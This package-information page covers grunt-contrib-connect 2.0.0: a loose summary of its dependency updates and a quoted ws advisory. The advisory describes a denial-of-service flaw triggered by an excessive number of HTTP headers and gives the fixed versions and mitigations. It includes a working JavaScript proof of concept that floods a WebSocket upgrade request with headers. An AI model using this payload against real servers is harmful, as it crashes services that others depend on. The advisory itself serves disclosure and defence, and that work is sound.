Grunt-contrib-connect version 2.0.0 represents a significant update over the previous stable version 1.0.2, bringing enhanced functionality and dependency updates beneficial for developers. One key difference lies in the updated dependencies; version 2.0.0 incorporates newer versions of crucial packages like opn, async, morgan, connect, node-http2, portscanner, serve-index, serve-static, and connect-livereload. This ensures compatibility with the latest web development standards and leverages potential performance improvements and bug fixes present in those updated dependencies. Specifically, the move to the node-http2 package allows for HTTP/2 support, potentially improving website loading times and overall performance. The update from opn version 4 to version 5 ensures your default browser will be opened in a more secure manner.
For developers, these upgrades translate to a more robust and modern development environment. The newer versions of connect and serve-static likely include improvements in handling static files and middleware, allowing for more efficient web server configurations. The updates to the listed devDependencies mean faster and improved code checking and testing for the developer, because they incorporate grunt-contrib-jshint, grunt-contrib-internal and grunt-contrib-nodeunit at their latest versions. Overall, the transition to version 2.0.0 provides a more streamlined and feature-rich experience for serving web applications during development, encouraging more secure and performant local web-server setups.
All the vulnerabilities related to version 2.0.0 of the package
ws affected by a DoS when handling a request with many HTTP headers
A request with a number of headers exceeding the server.maxHeadersCount threshold could be used to crash a ws server.
// Proof of concept from the ws advisory: a client sends an upgrade request
// carrying more header lines than the default server.maxHeadersCount (2000).
const http = require('http');
const WebSocket = require('ws');

const wss = new WebSocket.Server({ port: 0 }, function () {
  const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split('');
  const headers = {};
  let count = 0;

  // Generate 2000 distinct two-character header names.
  for (let i = 0; i < chars.length; i++) {
    if (count === 2000) break;

    for (let j = 0; j < chars.length; j++) {
      const key = chars[i] + chars[j];
      headers[key] = 'x';

      if (++count === 2000) break;
    }
  }

  // Standard WebSocket handshake headers on top of the filler headers.
  headers.Connection = 'Upgrade';
  headers.Upgrade = 'websocket';
  headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ==';
  headers['Sec-WebSocket-Version'] = '13';

  const request = http.request({
    headers: headers,
    host: '127.0.0.1',
    port: wss.address().port
  });

  request.end();
});
The vulnerability was fixed in ws@8.17.1 (https://github.com/websockets/ws/commit/e55e5106f10fcbaac37cfa89759e4cc0d073a52c) and backported to ws@7.5.10 (https://github.com/websockets/ws/commit/22c28763234aa75a7e1b76f5c01c181260d7917f), ws@6.2.3 (https://github.com/websockets/ws/commit/eeb76d313e2a00dd5247ca3597bba7877d064a63), and ws@5.2.4 (https://github.com/websockets/ws/commit/4abd8f6de4b0b65ef80b3ff081989479ed93377e)
In vulnerable versions of ws, the issue can be mitigated in the following ways:
1. Reduce the maximum allowed length of the request headers using the --max-http-header-size=size and/or the maxHeaderSize options so that no more headers than the server.maxHeadersCount limit can be sent.
2. Set server.maxHeadersCount to 0 so that no limit is applied.
The vulnerability was reported by Ryan LaPointe in https://github.com/websockets/ws/issues/2230.